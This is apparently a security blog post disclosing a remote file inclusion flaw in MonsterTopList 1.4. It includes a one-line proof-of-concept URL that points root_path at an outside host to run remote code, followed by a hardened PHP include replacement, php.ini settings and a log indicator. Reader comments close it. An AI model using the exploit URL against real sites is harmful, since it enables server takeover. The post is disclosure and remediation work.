MonsterTopList
=================================
MonsterTopList - Remote Code Execution bug
By: VietMafia
=================================
Developer site: http://www.monstertoplist.com/
Software: MTL 1.4
Risk: Moderate
Status: unpatched
=================================
This flaw is due to an input validation error in the "sources/functions.php" script (line 8),
which does not validate the "$root_path" variable before using it in a require statement.
Remote attackers can include malicious scripts and execute arbitrary commands with the
privileges of the web server.
code: file sources/functions.php
line 8: require $root_path . "sources/func_output.php";
demo:
http://www.monstertoplist.com/demo.html
POC Exploit: http://[target]/[path]/sources/functions.php?root_path=http://unsecured-systems.com/forum/
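The root cause is that $root_path is taken from request input (in PHP 4 with register_globals on, the query string populates it directly) and then handed to require, so a URL supplied by the attacker is fetched and executed. The following hardened replacement for that include is an added example written for this post, not MonsterTopList's own code; it assumes modern PHP (7+) and that functions.php lives directly under the application's sources/ directory.

```php
<?php
// Added example (not MTL code): a safe replacement for
//   require $root_path . "sources/func_output.php";
// The helper name safe_require is an assumption for illustration.

// 1. Never derive the application root from request data (GET/POST/cookie or a
//    register_globals-populated variable). Compute it from the script's own location:
//    this file is assumed to be <app>/sources/functions.php, so the app root is one up.
$root_path = dirname(__DIR__) . DIRECTORY_SEPARATOR;

// 2. Only include files that resolve to a real path inside the application tree.
function safe_require(string $root, string $relative): void
{
    // Reject anything with a scheme (http://, ftp://, php://, data:) so that no
    // stream wrapper can be reached even if allow_url_include is enabled.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)) {
        throw new RuntimeException("Refusing to include a URL or stream: $relative");
    }

    $base = realpath($root);
    $full = realpath($root . $relative);
    if ($base === false || $full === false) {
        throw new RuntimeException("Include target does not exist: $relative");
    }

    // realpath() collapses "../" segments, so a path that escapes $root will not
    // start with the canonical base directory. (Assumes $root is not the filesystem root.)
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException("Include target escapes application root: $relative");
    }

    require $full;
}

safe_require($root_path, 'sources/func_output.php');
```

Independently of the code fix, setting allow_url_include=Off (and register_globals=Off) in php.ini removes the remote-include primitive for the whole server, and a request log entry whose root_path parameter contains "://" is a reliable indicator that this flaw is being probed.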

5 Comments:
Glad to see VietMafia on the blog!
2:19 PM
He had problems posting to the forum. It seems that the IDS of the hoster has some problems and blocks some requests.
Maybe it will be fixed with the upgrade of the board, or maybe the hoster has something wrong.
9:31 PM
hm... I didn't know about that problem. I have made some posts in the last days without problems.
If he wants his own account on this blog, just let me know.
As I said, in the next days I will upgrade the board. About the hoster der4444, you know that it is quite good.
10:38 PM
r0t,
it's quite nice if I can have my own account on this blog. I'm learning, so I will try my best :)
VietMafia
6:12 PM
VietMafia, ok. The invitation will be sent to the email that you registered on the board.
4:12 PM